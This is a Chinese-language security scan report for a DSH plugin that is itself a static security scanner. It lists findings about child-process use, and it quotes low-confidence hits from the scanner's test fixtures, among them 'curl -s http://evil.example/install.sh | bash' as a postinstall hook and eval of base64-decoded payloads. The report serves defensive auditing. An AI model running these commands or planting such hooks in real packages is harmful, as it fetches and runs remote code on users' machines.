返回插件页
安全检测报告

deepseek-harness-sentinel未发现问题99/100

@Eligahyu
安全GitHub 源码安装(需 allowBuilds)

DSH 插件安全扫描器:只读静态审计(执行、凭据、外传、混淆、安装脚本、bundle 清单),输出 0-100 风险分。

Star5GitHub · 仅用于排序
npm 周下载未发布到 npm
固定 commit3211c3e9912026-08-21
扫描时间2026-08-22 08:25 UTCHT-DSH-0.2.2

检测结论

PASS · HT-DSH-0.2.2 · 3211c3e

在 129 个文件中有 23 项有效发现(置信度 ≥ 中)。

有效发现(置信度 ≥ 中):严重 0 0 0 23· 原始命中 80 · 低置信度不计入 57
安装
dsh plugin --profile web add github:Eligahyu/dsh-sentinel-scanner
源码安装会在你的机器上执行 prepare 构建,需要在 allowBuilds 中授权;建议改用 github:Eligahyu/dsh-sentinel-scanner#3211c3e 锁定本报告检测的 commit。

检测明细

每层做了什么、跑没跑、有效发现数
L0来源身份npm 元数据 ↔ 仓库已完成0
L1供应链安装脚本 · 未固定依赖 · 锁文件有锁文件0
L1已知漏洞OSV.dev · 仅生产依赖闭包已完成0
L2静态分析129 个文件 · 原始命中 79已完成23
L2.5模型研判sonnet · 2/2已完成2
L3权限清单覆盖宿主行 0 · 安全关键 0 · 敏感 0已完成0
L4隔离动态运行容器 · 假凭据金丝雀 · 出站记录未执行
L5人工复核申诉 72 小时内复核未执行
未执行的层不构成通过;只有“已完成”的层提供了证据。分数 = 100 − 去重规则罚分(严重 35 / 高 16 / 中 5 / 低 1),只用于同策略版本内排序。

权限清单 · cordis patch 解析

插件安装后会改变宿主的哪些行
插入的行1
覆盖/禁用的宿主行0
!!js 表达式0
浏览器端 bundle
覆盖的宿主行
没有覆盖任何 dsh-base 宿主行。
安全关键 seam · 未改动
sandboxsandbox-policybash-sandboxpwsh-sandboxapprovalpermissioncredentialssubprocessshell-envfs-observation-policy
“未改动”只说明该插件的 patch 没有覆盖这些行;插件代码仍以宿主进程权限运行。
插入的行
sentinel · deepseek-harness-sentinel/plugin
源码中出现的外部主机
json.schemastore.orgapi.osv.devdsh-sentinel.invalid
只是字符串出现,不等于运行时一定访问;用于核对插件声称的服务商与实际目的地是否一致。

证据

23 项有效 · 按严重度排序 · 严重项不折叠
低等级发现 23 项 · 计入结论但不改变状态展开
HT-EXEC-001直接创建宿主子进程
置信度 中L2 · 静态分析
engine/package/acquire.js:9GitHub
9spawnSync
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 中L2 · 静态分析
engine/package/acquire.js:9GitHub
9node:child_process
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 中L2 · 静态分析
engine/package/tarball.js:11GitHub
11spawnSync
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 中L2 · 静态分析
engine/package/tarball.js:11GitHub
11node:child_process
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 中L2 · 静态分析
engine/rules.js:77GitHub
77child_process
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 中L2 · 静态分析
engine/rules.js:77GitHub
77execSync
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 中L2 · 静态分析
engine/scanner.js:579GitHub
579child_process
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 中L2 · 静态分析
engine/semantic/ast.js:101GitHub
101child_process
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 中L2 · 静态分析
engine/semantic/ast.js:103GitHub
103child_process
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 中L2 · 静态分析
engine/semantic/cross-file-taint.js:14GitHub
14execSync
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 中L2 · 静态分析
engine/semantic/cross-file-taint.js:14GitHub
14spawnSync
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 中L2 · 静态分析
engine/semantic/harness.js:187GitHub
187execSync
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 中L2 · 静态分析
engine/semantic/harness.js:187GitHub
187spawnSync
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 中L2 · 静态分析
engine/semantic/index.js:38GitHub
38execSync
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 中L2 · 静态分析
engine/semantic/index.js:38GitHub
38spawnSync
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 中L2 · 静态分析
engine/semantic/taint.js:16GitHub
16execSync
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 中L2 · 静态分析
engine/semantic/taint.js:16GitHub
16spawnSync
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 中L2 · 静态分析
engine/supplychain/osv.js:10GitHub
10spawnSync
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 中L2 · 静态分析
engine/supplychain/osv.js:10GitHub
10node:child_process
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 中L2 · 静态分析
scripts/fetch-corpus-npm.mjs:11GitHub
11spawnSync
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 中L2 · 静态分析
scripts/fetch-corpus-npm.mjs:11GitHub
11node:child_process
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 中L2 · 静态分析
scripts/fetch-corpus.mjs:17GitHub
17spawnSync
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 中L2 · 静态分析
scripts/fetch-corpus.mjs:17GitHub
17node:child_process
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
低置信度命中 57 项 · 不计入结论展开
严重HT-EXEC-002远程脚本直连 Shell 执行
置信度 低L2 · 静态分析
docs/example-report.json:93GitHub
93curl -s http://evil.example/install.sh | bash
规则备注 · 更像是展示给用户的安装提示字符串,而非程序自行执行;位于测试、示例或文档目录
修复建议先下载并校验固定哈希,再由用户显式执行。
严重HT-EXEC-002远程脚本直连 Shell 执行
置信度 低L2 · 静态分析
docs/example-report.json:205GitHub
205curl -s http://evil.example/x.sh | bash
规则备注 · 命中位置附近存在子进程调用;位于测试、示例或文档目录
修复建议先下载并校验固定哈希,再由用户显式执行。
严重HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
engine/report.js:66GitHub
66eval(
规则备注 · 动态执行与编码解码出现在同一语句,是典型的载荷隐藏模式
模型研判占位/示例

report.js:66 是代码注释中的举例文字“例:eval(atob(...))”,用于说明重叠抑制逻辑,并非真实存在的 eval 调用。

修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
HT-OBFUSCATION-001源码呈现混淆或载荷隐藏特征
置信度 低L2 · 静态分析
engine/report.js:66GitHub
66atob(...)) 同时命中 SEN-EXEC-004(解码执行,具体)与 SEN-EXEC-003(裸 eval
规则备注 · 解码后直接进入执行
模型研判占位/示例

同一行 66 属于注释说明文本,仅作为规则示例出现,不会被解释器执行。

修复建议以可读源码分发;若必须打包,请提供可复现构建与 source map。
严重HT-EXEC-002远程脚本直连 Shell 执行
置信度 低L2 · 静态分析
engine/rules.js:376GitHub
376curl/wget/网络地址/base64/chmod 等,典型形状是 curl … | bash
规则备注 · 更像是展示给用户的安装提示字符串,而非程序自行执行
修复建议先下载并校验固定哈希,再由用户显式执行。
HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
engine/rules.js:142GitHub
142new Function(
规则备注 · 出现在字符串或注释中
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
engine/rules.js:142GitHub
142new Function(
规则备注 · 出现在字符串或注释中
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/cross-file-taint.test.js:17GitHub
17node:child_process
规则备注 · 命令由运行时变量拼接,需确认输入来源是否可信;位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/fixtures/bench/edge/edge-assignment.jsGitHub
1node:child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
test/fixtures/bench/edge/edge-db-exec.js:6GitHub
6eval(
规则备注 · 位于测试、示例或文档目录
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
HT-OBFUSCATION-001源码呈现混淆或载荷隐藏特征
置信度 低L2 · 静态分析
test/fixtures/bench/edge/edge-db-exec.js:5GitHub
5Buffer.from(args.data, 'base64').toString() eval
规则备注 · 解码后直接进入执行;位于测试、示例或文档目录
修复建议以可读源码分发;若必须打包,请提供可复现构建与 source map。
HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/fixtures/bench/edge/edge-destructure.jsGitHub
1node:child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/fixtures/bench/edge/edge-object-property.jsGitHub
1node:child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/fixtures/bench/edge/edge-spawn-safe-argv.jsGitHub
1node:child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/fixtures/bench/edge/edge-spawn-shell.jsGitHub
1node:child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/fixtures/bench/edge/edge-trusted-comment-bypass.jsGitHub
1node:child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/fixtures/bench/edge/edge-ts-tool.tsGitHub
1node:child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/fixtures/bench/evasions/ev1-alias.jsGitHub
1child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/fixtures/bench/evasions/ev2-computed-prop.jsGitHub
1child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/fixtures/bench/evasions/ev3-optional-chain.jsGitHub
1child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/fixtures/bench/malicious/pos1-tool-shell.jsGitHub
1node:child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
严重HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
test/fixtures/bench/malicious/pos2-eval-atob.js:2GitHub
2eval(
规则备注 · 动态执行与编码解码出现在同一语句,是典型的载荷隐藏模式;位于测试、示例或文档目录
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
test/fixtures/bench/malicious/pos6-decode-exec.js:2GitHub
2eval(
规则备注 · 位于测试、示例或文档目录
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
HT-OBFUSCATION-001源码呈现混淆或载荷隐藏特征
置信度 低L2 · 静态分析
test/fixtures/bench/malicious/pos6-decode-exec.jsGitHub
1Buffer.from(payload, 'base64').toString() eval
规则备注 · 解码后直接进入执行;位于测试、示例或文档目录
修复建议以可读源码分发;若必须打包,请提供可复现构建与 source map。
HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/fixtures/bench/malicious/pos7-cross-function.jsGitHub
1node:child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-INSTALL-001安装阶段执行高风险生命周期脚本
置信度 低L1 · 供应链
test/fixtures/evil-plugin/package.json:12GitHub
12"postinstall": "curl -s http://evil.example/install.sh | bash"
规则备注 · 位于测试、示例或文档目录
修复建议移除安装期执行,或提供可复现构建产物并将脚本改为显式命令。
严重HT-EXEC-002远程脚本直连 Shell 执行
置信度 低L2 · 静态分析
test/fixtures/evil-plugin/package.json:12GitHub
12curl -s http://evil.example/install.sh | bash
规则备注 · 命令位于字符串字面量中,执行路径需人工确认;位于测试、示例或文档目录
修复建议先下载并校验固定哈希,再由用户显式执行。
HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/fixtures/evil-plugin/plugin/index.js:7GitHub
7node:child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/fixtures/evil-plugin/plugin/index.js:27GitHub
27execSync
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
严重HT-EXEC-002远程脚本直连 Shell 执行
置信度 低L2 · 静态分析
test/fixtures/evil-plugin/plugin/index.js:24GitHub
24curl -s http://evil.example/x.sh | bash
规则备注 · 命中位置附近存在子进程调用;位于测试、示例或文档目录
修复建议先下载并校验固定哈希,再由用户显式执行。
HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
test/fixtures/evil-plugin/plugin/index.js:18GitHub
18eval(
规则备注 · 出现在字符串或注释中;位于测试、示例或文档目录
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
严重HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
test/fixtures/evil-plugin/plugin/index.js:20GitHub
20eval(
规则备注 · 动态执行与编码解码出现在同一语句,是典型的载荷隐藏模式;位于测试、示例或文档目录
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/hardening.test.js:9GitHub
9execFileSync
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/hardening.test.js:9GitHub
9node:child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
test/hardening.test.js:591GitHub
591eval(
规则备注 · 位于测试、示例或文档目录
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
test/hardening.test.js:827GitHub
827eval(
规则备注 · 出现在字符串或注释中;位于测试、示例或文档目录
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
严重HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
test/plugin-load.test.js:83GitHub
83eval(
规则备注 · 动态执行与编码解码出现在同一语句,是典型的载荷隐藏模式;位于测试、示例或文档目录
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/professional.test.js:194GitHub
194node:child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/professional.test.js:226GitHub
226child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
严重HT-EXEC-002远程脚本直连 Shell 执行
置信度 低L2 · 静态分析
test/professional.test.js:516GitHub
516curl evil | sh
规则备注 · 命令位于字符串字面量中,执行路径需人工确认;位于测试、示例或文档目录
修复建议先下载并校验固定哈希,再由用户显式执行。
严重HT-EXEC-002远程脚本直连 Shell 执行
置信度 低L2 · 静态分析
test/professional.test.js:672GitHub
672curl http://evil.example/x | bash
规则备注 · 命中位置附近存在子进程调用;位于测试、示例或文档目录
修复建议先下载并校验固定哈希,再由用户显式执行。
严重HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
test/professional.test.js:84GitHub
84eval(
规则备注 · 动态执行与编码解码出现在同一语句,是典型的载荷隐藏模式;位于测试、示例或文档目录
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
test/professional.test.js:309GitHub
309eval(
规则备注 · 位于测试、示例或文档目录
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
严重HT-SECRET-001疑似硬编码凭据
置信度 低L2 · 静态分析
test/professional.test.js:167GitHub
167sk-proj-ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
规则备注 · 包含占位/示例词汇;位于测试、示例或文档目录
修复建议立即吊销凭据,并改用 DSH 凭据服务或环境引用。
严重HT-SECRET-001疑似硬编码凭据
置信度 低L2 · 静态分析
test/professional.test.js:183GitHub
183ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghij
规则备注 · 包含占位/示例词汇;位于测试、示例或文档目录
修复建议立即吊销凭据,并改用 DSH 凭据服务或环境引用。
HT-OBFUSCATION-001源码呈现混淆或载荷隐藏特征
置信度 低L2 · 静态分析
test/professional.test.js:308GitHub
308Buffer.from(payload, 'base64').toString() eval
规则备注 · 解码后直接进入执行;位于测试、示例或文档目录
修复建议以可读源码分发;若必须打包,请提供可复现构建与 source map。
HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/scan.test.js:229GitHub
229execSync
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/scan.test.js:266GitHub
266child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
严重HT-EXEC-002远程脚本直连 Shell 执行
置信度 低L2 · 静态分析
test/scan.test.js:57GitHub
57curl | bash
规则备注 · 命令位于字符串字面量中,执行路径需人工确认;位于测试、示例或文档目录
修复建议先下载并校验固定哈希,再由用户显式执行。
严重HT-EXEC-002远程脚本直连 Shell 执行
置信度 低L2 · 静态分析
test/scan.test.js:66GitHub
66curl|bash
规则备注 · 命令位于字符串字面量中,执行路径需人工确认;位于测试、示例或文档目录
修复建议先下载并校验固定哈希,再由用户显式执行。
严重HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
test/scan.test.js:59GitHub
59eval(
规则备注 · 动态执行与编码解码出现在同一语句,是典型的载荷隐藏模式;位于测试、示例或文档目录
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
test/scan.test.js:375GitHub
375new Function(
规则备注 · 出现在字符串或注释中;位于测试、示例或文档目录
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/v2.test.js:355GitHub
355child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/v2.test.js:400GitHub
400child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
严重HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
test/v2.test.js:85GitHub
85eval(
规则备注 · 动态执行与编码解码出现在同一语句,是典型的载荷隐藏模式;位于测试、示例或文档目录
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
test/v2.test.js:102GitHub
102eval(
规则备注 · 出现在字符串或注释中;位于测试、示例或文档目录
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
HT-OBFUSCATION-001源码呈现混淆或载荷隐藏特征
置信度 低L2 · 静态分析
test/v2.test.js:386GitHub
386Buffer.from(payload, 'base64').toString() eval
规则备注 · 解码后直接进入执行;位于测试、示例或文档目录
修复建议以可读源码分发;若必须打包,请提供可复现构建与 source map。

依赖漏洞 · L1

已查询 OSV.dev:package-lock.json 中的生产依赖,0 个已知漏洞
开发依赖及其传递链不计入;只覆盖 OSV 收录的公开漏洞;是否可被利用取决于插件如何使用该依赖。

身份与来源

GitHubEligahyu/dsh-sentinel-scanner固定 commit3211c3e991f2 · 2026-08-21内容摘要sha256:346952ee5c2e92eanpmdeepseek-harness-sentinel@0.4.3 · 8 个版本最近发布2026-08-20 04:10 UTCrepository 字段未声明 repository发布来源证明无 provenance维护者1发布包 ↔ 源码未比对收录日期2026-08-20

宿主能力

范围,不是结论
凭据环境变量文件系统Host BundleMCP外部网络宿主子进程
能力标签来自源码中的 API 使用模式:插件读文件、访问网络、创建子进程、读取凭据都会被标出。很多能力是功能所需;有没有问题看上面的证据。

检测覆盖

源码获取已完成
manifest 解析已完成
bundle 配置已完成
依赖锁定有锁文件
已知漏洞查询已完成
来源身份已完成
发布包 ↔ 源码比对未比对
模型研判已完成
隔离动态运行未执行
人工复核未执行
2026-08-22 08:25 UTC未发现问题
HT-DSH-0.2.2 · 3211c3e
策略升级到 HT-DSH-0.2.2
2026-08-21 11:28 UTC未发现问题
HT-DSH-0.2.1 · 3211c3e
判定从 CAUTION 变为 PASS
2026-08-21 10:57 UTC存在风险
HT-DSH-0.2.0 · 3211c3e
首次扫描

徽章

贴进 README,点击回到本页
Harness Trust: 未发现问题
[![Harness Trust](https://dshmod.com/badge/eligahyu-dsh-sentinel-scanner.svg)](https://dshmod.com/plugins/eligahyu-dsh-sentinel-scanner)
API 文档
徽章文案只有风险状态与策略版本,状态变化时自动更新。

已知限制与申诉

作者或用户认为某项发现不成立?提交申诉,我们在 72 小时内复核并公开处理记录。